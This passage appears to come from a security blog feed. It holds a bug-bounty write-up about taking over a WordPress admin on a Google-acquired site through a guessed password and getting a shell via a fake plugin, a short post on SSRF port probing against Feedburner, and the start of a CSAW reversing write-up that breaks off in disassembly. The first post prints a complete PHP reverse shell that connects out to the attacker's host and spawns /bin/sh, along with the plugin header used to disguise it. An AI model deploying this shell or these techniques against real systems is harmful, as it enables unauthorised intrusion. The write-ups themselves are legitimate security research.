it passes 6 months mark. So I decided to read more about recent Google Acquisition. Wikipedia has an aswesome page which contains an entire list of the <a href="https://en.wikipedia.org/wiki/List_of_mergers_and_acquisitions_by_Google" target="_blank">companies acquired by Google</a>. I decided to check the companies which were acquired in 2014 so that I was assured it is eligible for the bounty program.</p> <p>After some reconnaisance, I decided to fix my target on <code class="language-plaintext highlighter-rouge">songza.com</code> which was acquired by Google in July 2014. When I visited the website, I got redirected to <code class="language-plaintext highlighter-rouge">daily.songza.com</code> which was running on Wordpress 3.8.1. The Wordpress version 3.8.1 itself has several vulnerabilities (latest version is 4.4.2 at the time of writing) but I was not interested in those. I decided to enumerate the Wordpress users available so that I can try logging in with them using common passwords.</p> <p>After the enumeration, I saw that the site has 9 users. I manually tried logging in with some common password formats. One of them turned out to be correct and I got logged in ! I couldn’t believe my eyes at first but the logged in user was an Administrator. One of the usernames among the enumerated one was <code class="language-plaintext highlighter-rouge">Michael</code> and his password was nothing but his username (<code class="language-plaintext highlighter-rouge">Michael</code>) itself !</p> <p>So, now I got the admin panel of the site. Now I had 2 options:</p> <ol> <li>Report this to Google now along with its after effects or</li> <li>Upload a <strong>PHP shell</strong> as a valid Wordpress plugin and use it to achieve command execution !</li> </ol> <p>I believe that by now you would have guessed which option I would have chosen. So I quickly searched for a PHP reverse shell and got one:</p> <p><a href="http://pentestmonkey.net/tools/php-reverse-shell" target="_blank">Original Author: PentestMonkey</a></p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="nb">set_time_limit</span> <span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="nv">$VERSION</span> <span class="o">=</span> <span class="s2">"1.0"</span><span class="p">;</span> <span class="nv">$ip</span> <span class="o">=</span> <span class="s1">'xxx.xxx.xxx.xxx'</span><span class="p">;</span> <span class="c1">// CHANGE THIS</span> <span class="nv">$port</span> <span class="o">=</span> <span class="mi">8080</span><span class="p">;</span> <span class="c1">// CHANGE THIS</span> <span class="nv">$chunk_size</span> <span class="o">=</span> <span class="mi">1400</span><span class="p">;</span> <span class="nv">$write_a</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span> <span class="nv">$error_a</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span> <span class="nv">$shell</span> <span class="o">=</span> <span class="s1">'uname -a; w; id; /bin/sh -i'</span><span class="p">;</span> <span class="nv">$daemon</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nv">$debug</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//</span> <span class="c1">// Daemonise ourself if possible to avoid zombies later</span> <span class="c1">//</span> <span class="c1">// pcntl_fork is hardly ever available, but will allow us to daemonise</span> <span class="c1">// our php process and avoid zombies. Worth a try...</span> <span class="k">if</span> <span class="p">(</span><span class="nb">function_exists</span><span class="p">(</span><span class="s1">'pcntl_fork'</span><span class="p">))</span> <span class="p">{</span> <span class="c1">// Fork and have the parent process exit</span> <span class="nv">$pid</span> <span class="o">=</span> <span class="nb">pcntl_fork</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$pid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"ERROR: Can't fork"</span><span class="p">);</span> <span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$pid</span><span class="p">)</span> <span class="p">{</span> <span class="k">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="c1">// Parent exits</span> <span class="p">}</span> <span class="c1">// Make the current process a session leader</span> <span class="c1">// Will only succeed if we forked</span> <span class="k">if</span> <span class="p">(</span><span class="nb">posix_setsid</span><span class="p">()</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"Error: Can't setsid()"</span><span class="p">);</span> <span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="nv">$daemon</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"WARNING: Failed to daemonise. This is quite common and not fatal."</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Change to a safe directory</span> <span class="nb">chdir</span><span class="p">(</span><span class="s2">"/"</span><span class="p">);</span> <span class="c1">// Remove any umask we inherited</span> <span class="nb">umask</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="c1">//</span> <span class="c1">// Do the reverse shell...</span> <span class="c1">//</span> <span class="c1">// Open reverse connection</span> <span class="nv">$sock</span> <span class="o">=</span> <span class="nb">fsockopen</span><span class="p">(</span><span class="nv">$ip</span><span class="p">,</span> <span class="nv">$port</span><span class="p">,</span> <span class="nv">$errno</span><span class="p">,</span> <span class="nv">$errstr</span><span class="p">,</span> <span class="mi">30</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$sock</span><span class="p">)</span> <span class="p">{</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"</span><span class="nv">$errstr</span><span class="s2"> (</span><span class="nv">$errno</span><span class="s2">)"</span><span class="p">);</span> <span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Spawn shell process</span> <span class="nv">$descriptorspec</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span> <span class="mi">0</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">"pipe"</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">),</span> <span class="c1">// stdin is a pipe that the child will read from</span> <span class="mi">1</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">"pipe"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">),</span> <span class="c1">// stdout is a pipe that the child will write to</span> <span class="mi">2</span> <span class="o">=&gt;</span> <span class="k">array</span><span class="p">(</span><span class="s2">"pipe"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="c1">// stderr is a pipe that the child will write to</span> <span class="p">);</span> <span class="nv">$process</span> <span class="o">=</span> <span class="nb">proc_open</span><span class="p">(</span><span class="nv">$shell</span><span class="p">,</span> <span class="nv">$descriptorspec</span><span class="p">,</span> <span class="nv">$pipes</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nb">is_resource</span><span class="p">(</span><span class="nv">$process</span><span class="p">))</span> <span class="p">{</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"ERROR: Can't spawn shell"</span><span class="p">);</span> <span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Set everything to non-blocking</span> <span class="c1">// Reason: Occsionally reads will block, even though stream_select tells us they won't</span> <span class="nb">stream_set_blocking</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span> <span class="nb">stream_set_blocking</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span> <span class="nb">stream_set_blocking</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span> <span class="nb">stream_set_blocking</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"Successfully opened reverse shell to </span><span class="nv">$ip</span><span class="s2">:</span><span class="nv">$port</span><span class="s2">"</span><span class="p">);</span> <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Check for end of TCP connection</span> <span class="k">if</span> <span class="p">(</span><span class="nb">feof</span><span class="p">(</span><span class="nv">$sock</span><span class="p">))</span> <span class="p">{</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"ERROR: Shell connection terminated"</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Check for end of STDOUT</span> <span class="k">if</span> <span class="p">(</span><span class="nb">feof</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span> <span class="p">{</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"ERROR: Shell process terminated"</span><span class="p">);</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Wait until a command is end down $sock, or some</span> <span class="c1">// command output is available on STDOUT or STDERR</span> <span class="nv">$read_a</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span> <span class="nv">$num_changed_sockets</span> <span class="o">=</span> <span class="nb">stream_select</span><span class="p">(</span><span class="nv">$read_a</span><span class="p">,</span> <span class="nv">$write_a</span><span class="p">,</span> <span class="nv">$error_a</span><span class="p">,</span> <span class="kc">null</span><span class="p">);</span> <span class="c1">// If we can read from the TCP socket, send</span> <span class="c1">// data to process's STDIN</span> <span class="k">if</span> <span class="p">(</span><span class="nb">in_array</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$read_a</span><span class="p">))</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"SOCK READ"</span><span class="p">);</span> <span class="nv">$input</span> <span class="o">=</span> <span class="nb">fread</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$chunk_size</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"SOCK: </span><span class="nv">$input</span><span class="s2">"</span><span class="p">);</span> <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="nv">$input</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// If we can read from the process's STDOUT</span> <span class="c1">// send data down tcp connection</span> <span class="k">if</span> <span class="p">(</span><span class="nb">in_array</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$read_a</span><span class="p">))</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"STDOUT READ"</span><span class="p">);</span> <span class="nv">$input</span> <span class="o">=</span> <span class="nb">fread</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$chunk_size</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"STDOUT: </span><span class="nv">$input</span><span class="s2">"</span><span class="p">);</span> <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$input</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// If we can read from the process's STDERR</span> <span class="c1">// send data down tcp connection</span> <span class="k">if</span> <span class="p">(</span><span class="nb">in_array</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="nv">$read_a</span><span class="p">))</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"STDERR READ"</span><span class="p">);</span> <span class="nv">$input</span> <span class="o">=</span> <span class="nb">fread</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="nv">$chunk_size</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nf">printit</span><span class="p">(</span><span class="s2">"STDERR: </span><span class="nv">$input</span><span class="s2">"</span><span class="p">);</span> <span class="nb">fwrite</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$input</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="nb">fclose</span><span class="p">(</span><span class="nv">$sock</span><span class="p">);</span> <span class="nb">fclose</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="nb">fclose</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="nb">fclose</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span> <span class="nb">proc_close</span><span class="p">(</span><span class="nv">$process</span><span class="p">);</span> <span class="c1">// Like print, but does nothing if we've daemonised ourself</span> <span class="c1">// (I can't figure out how to redirect STDOUT like a proper daemon)</span> <span class="k">function</span> <span class="n">printit</span> <span class="p">(</span><span class="nv">$string</span><span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$daemon</span><span class="p">)</span> <span class="p">{</span> <span class="k">print</span> <span class="s2">"</span><span class="nv">$stringn</span><span class="s2">"</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="cp">?&gt;</span> </code></pre></figure> <p>Now I added some comments to the top of the page so that the shell will truly look like a Wordpress plugin with Author information.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* * Plugin Name: Shell * Plugin URI: https://blog.0daylabs.com * Author: a0xnirudh * Version: 1.0 * Author URI: https://blog.0daylabs.com * */ </code></pre></div></div> <p>After this, I zipped the PHP shell and uploaded the plugin. The moment I clicked on <code class="language-plaintext highlighter-rouge">Activate plugin</code> on the dashboard, I got a reverse shell back to my server. I can now execute commands on a Google Acquisition !! :O</p> <p>I reported this to Google but they were not happy since I uploaded a shell. Now they have to involve the Incident response team to secure the server back. They also warned me that <strong>uploading shells</strong> was against their policy but since it was my first bug report, they didn’t disqualify it.</p> <p>Next time when you get a vulnerability using which you are sure that you can upload a shell, <strong>better stop it there and report</strong> (I know how hard it is to stop there but just report it and let it go or else you might get disqualified) !</p> <p>Google payed me $1337 for this report and listed my name on their <a href="https://www.google.com/about/appsecurity/hall-of-fame/archive/">Security Hall of Fame</a>.</p> Thu, 11 Feb 2016 00:00:00 -0800 https://blog.0daylabs.com/2016/02/11/How-I-got-a-shell-on-google-acquisition/ https://blog.0daylabs.com/2016/02/11/How-I-got-a-shell-on-google-acquisition/ bugbounty SSRF vulnerability on Google's Feedburner <p>Recently after getting an SSRF on <a href="https://blog.0daylabs.com/2015/08/09/SSRF-in-Microsoft-bing/">Microsoft’s Bing Webmaster central</a>, I decided to test the same attack on any of the Google acquisitions and feedburner was a great choice. So I quickly went ahead to test the site and I saw an option to add new feed from a URL. Let’s try injecting port numbers into it and see what happens:</p> <p>As usual, I entered the url <code class="language-plaintext highlighter-rouge">https://scanme.nmap.org:22</code> and to my surprise, I got back a result saying: <code class="language-plaintext highlighter-rouge">Received HTTP error code -1 while fetching source feed</code>. Well, it looks like this is vulnerable to SSRF. Let’s confirm it by trying with a closed port; so this time I changed the port number from 22 to 25, which is a closed port, I got another error saying: <code class="language-plaintext highlighter-rouge">An error occurred connecting to the URL: unknown error</code>. Well, I guess the vulnerability is confirmed now. I got 2 different errors depending on whether the port number is closed or not.</p> <p>I tried to expand this by trying to scan the internal networks but unfortunately I had no luck there. Then I tried using other protocols like <code class="language-plaintext highlighter-rouge">file://</code> but this was also restricted. Only <code class="language-plaintext highlighter-rouge">http://</code> or <code class="language-plaintext highlighter-rouge">https://</code> can be used. Sadly I reported the bug to Google hoping that they will atleast fix it but won’t reward since it’s a low priority bug. The reply they gave was: <code class="language-plaintext highlighter-rouge">The ability to scan a port is not in itself a vulnerability</code>. It seems they have already explained about this on their <a href="https://sites.google.com/site/bughunteruniversity/nonvuln/ip-port-scanning-via-google-services">bug hunters university</a></p> <p>Even through Google said that this is not a vulnerability, at a later point of time I saw that this issue has been being fixed. And as of now, no matter what port number you give, it always returns the error: <code class="language-plaintext highlighter-rouge">An error occurred connecting to the URL: internal error</code>. Looks like they patched the vulnerability but didn’t give any credits for it.</p> Wed, 10 Feb 2016 00:00:00 -0800 https://blog.0daylabs.com/2016/02/10/SSRF-on-google-feedburner/ https://blog.0daylabs.com/2016/02/10/SSRF-on-google-feedburner/ bugbounty Slaying the Dragon - CSAW 2015 REV 500 writeup <p>For this challenge we are given a binary named <code class="language-plaintext highlighter-rouge">wyvern</code>, which is a 64-bit ELF file.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>temp@temp ~/D/M/C/C/wyvern&gt; file wyvern wyvern: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=45f9b5b50d013fe43405dc5c7fe651c91a7a7ee8, not stripped </code></pre></div></div> <p>We are also given the following hints</p> <ul> <li>There is a dragon afoot, we need a hero. Give us the secret of the dragon and we will give you a flag.</li> <li>HINT: static is only 1 of 2 methods to RE. IDA torrent unnecessary</li> </ul> <p>Before attempting to do any reversing, let us run the file first.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>temp@temp ~/D/M/C/C/wyvern&gt; ./wyvern +-----------------------+ | Welcome Hero | +-----------------------+ ! Quest: there is a dragon prowling the domain. brute strength and magic is our only hope. Test your skill. Enter the dragons secret: a - You have failed. The dragons power, speed and intelligence was greater. </code></pre></div></div> <p>This sample run provides us with 2 facts about the binary.</p> <ul> <li>It accepts user input</li> <li>It validates the input</li> </ul> <p>We can also assume the following fact</p> <ul> <li>The length of the input is validated</li> </ul> <p>After this,we wont be able to progress much further without disassembling it.</p> <p>Upon disassembling the <code class="language-plaintext highlighter-rouge">main()</code> function, we stumble across the following lines of code</p> <figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E1</span><span class="n">DF</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="n">esi</span><span class="p">,</span> <span class="mi">101</span><span class="n">h</span> <span class="p">;</span> <span class="n">n</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E1</span><span class="n">E4</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="n">rdi</span><span class="p">,</span> <span class="n">rcx</span> <span class="p">;</span> <span class="n">s</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E1</span><span class="n">E7</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_180</span><span class="p">],</span> <span class="n">rax</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E1</span><span class="n">EE</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_188</span><span class="p">],</span> <span class="n">rcx</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E1</span><span class="n">F5</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">call</span> <span class="n">_fgets</span> <span class="p">;</span> <span class="n">Call</span> <span class="n">Procedure</span> <span class="c1">//User input with limit 0x101(257)</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E1</span><span class="n">F5</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E1</span><span class="n">FA</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">lea</span> <span class="n">rcx</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_120</span><span class="p">]</span> <span class="p">;</span> <span class="n">Load</span> <span class="n">Effective</span> <span class="n">Address</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E201</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="n">rdi</span><span class="p">,</span> <span class="n">rcx</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E204</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_190</span><span class="p">],</span> <span class="n">rax</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E20</span><span class="n">B</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_198</span><span class="p">],</span> <span class="n">rcx</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E212</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">call</span> <span class="n">__ZNSaIcEC1Ev</span> <span class="p">;</span> <span class="n">std</span><span class="o">::</span><span class="n">allocator</span><span class="o">&lt;</span><span class="kt">char</span><span class="o">&gt;::</span><span class="n">allocator</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="c1">//Creating string object using user input</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E217</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">lea</span> <span class="n">rdi</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_118</span><span class="p">]</span> <span class="p">;</span> <span class="n">Load</span> <span class="n">Effective</span> <span class="n">Address</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E242</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">lea</span> <span class="n">rdi</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_138</span><span class="p">]</span> <span class="p">;</span> <span class="n">this</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E249</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">lea</span> <span class="n">rsi</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_118</span><span class="p">]</span> <span class="p">;</span> <span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="o">*</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E250</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">call</span> <span class="n">__ZNSsC1ERKSs</span> <span class="p">;</span> <span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="o">::</span><span class="n">string</span><span class="p">(</span><span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="k">const</span><span class="o">&amp;</span><span class="p">)</span> <span class="c1">//Initialize another string object with user string object </span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E25</span><span class="n">A</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">lea</span> <span class="n">rdi</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_138</span><span class="p">]</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E261</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">call</span> <span class="n">_Z11start_questSs</span> <span class="p">;</span> <span class="n">start_quest</span><span class="p">(</span><span class="n">std</span><span class="o">::</span><span class="n">string</span><span class="p">)</span> <span class="c1">//Calling function start_quest with the string object containing user input</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E266</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_19C</span><span class="p">],</span> <span class="n">eax</span> <span class="c1">//Return value is stored in [rbp+var_19C]</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E271</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_19C</span><span class="p">]</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E277</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">sub</span> <span class="n">eax</span><span class="p">,</span> <span class="mi">1337</span><span class="n">h</span> <span class="p">;</span> <span class="n">Integer</span> <span class="n">Subtraction</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E27</span><span class="n">C</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">setz</span> <span class="n">cl</span> <span class="p">;</span> <span class="n">Set</span> <span class="n">Byte</span> <span class="k">if</span> <span class="n">Zero</span> <span class="p">(</span><span class="n">ZF</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> <span class="c1">//If eax==0x1337, cl is set</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E27</span><span class="n">F</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">lea</span> <span class="n">rdi</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_138</span><span class="p">]</span> <span class="p">;</span> <span class="n">this</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E286</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_1A0</span><span class="p">],</span> <span class="n">eax</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E28</span><span class="n">C</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_1A1</span><span class="p">],</span> <span class="n">cl</span> <span class="c1">//cl is stored in [rbp+var_1A1]</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E29</span><span class="n">C</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="n">al</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_1A1</span><span class="p">]</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E2</span><span class="n">A2</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">test</span> <span class="n">al</span><span class="p">,</span> <span class="mi">1</span> <span class="p">;</span> <span class="n">Logical</span> <span class="n">Compare</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E2</span><span class="n">A4</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">jnz</span> <span class="n">loc_40E2AF</span> <span class="p">;</span> <span class="n">Jump</span> <span class="k">if</span> <span class="n">Not</span> <span class="n">Zero</span> <span class="p">(</span><span class="n">ZF</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span> <span class="c1">//If cl is not set, jump to loc_40E2AF</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E2</span><span class="n">AA</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">jmp</span> <span class="n">loc_40E36C</span> <span class="p">;</span> <span class="n">Jump</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E36</span><span class="n">C</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="n">offset</span> <span class="n">_ZSt4cout</span><span class="err">@@</span><span class="n">GLIBCXX_3_4</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E371</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="n">edi</span><span class="p">,</span> <span class="n">eax</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E373</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="n">eax</span><span class="p">,</span> <span class="n">offset</span> <span class="n">aYouHaveFailed_</span> <span class="p">;</span> <span class="s">"</span><span class="se">\n</span><span class="s">[-] You have failed. The dragon's pow"</span><span class="p">...</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E378</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">mov</span> <span class="n">esi</span><span class="p">,</span> <span class="n">eax</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E37</span><span class="n">A</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">call</span> <span class="n">__ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc</span> <span class="p">;</span> <span class="n">std</span><span class="o">::</span><span class="n">operator</span><span class="o">&lt;&lt;&lt;</span><span class="n">std</span><span class="o">::</span><span class="n">char_traits</span><span class="o">&lt;</span><span class="kt">char</span><span class="o">&gt;&gt;</span><span class="p">(</span><span class="n">std</span><span class="o">::</span><span class="n">basic_ostream</span><span class="o">&lt;</span><span class="kt">char</span><span class="p">,</span><span class="n">std</span><span class="o">::</span><span class="n">char_traits</span><span class="o">&lt;</span><span class="kt">char</span><span class="o">&gt;&gt;</span> <span class="o">&amp;</span><span class="p">,</span><span class="kt">char</span> <span class="k">const</span><span class="o">*</span><span class="p">)</span> <span class="c1">//Output failed.</span> <span class="p">.</span><span class="n">text</span><span class="o">:</span><span class="mf">000000000040E2</span><span class="n">AF</span> <span class="mi">1</span><span class="n">C8</span> <span class="n">lea</span> <span class="n">rdi</span><span class="p">,</span> <span class="p">[</span><span class="n">rbp</span><span class="o">+</span><span class="n">var_140</span><span class="p">]</span> <span class="p">.</span><span class="n">text</span><span 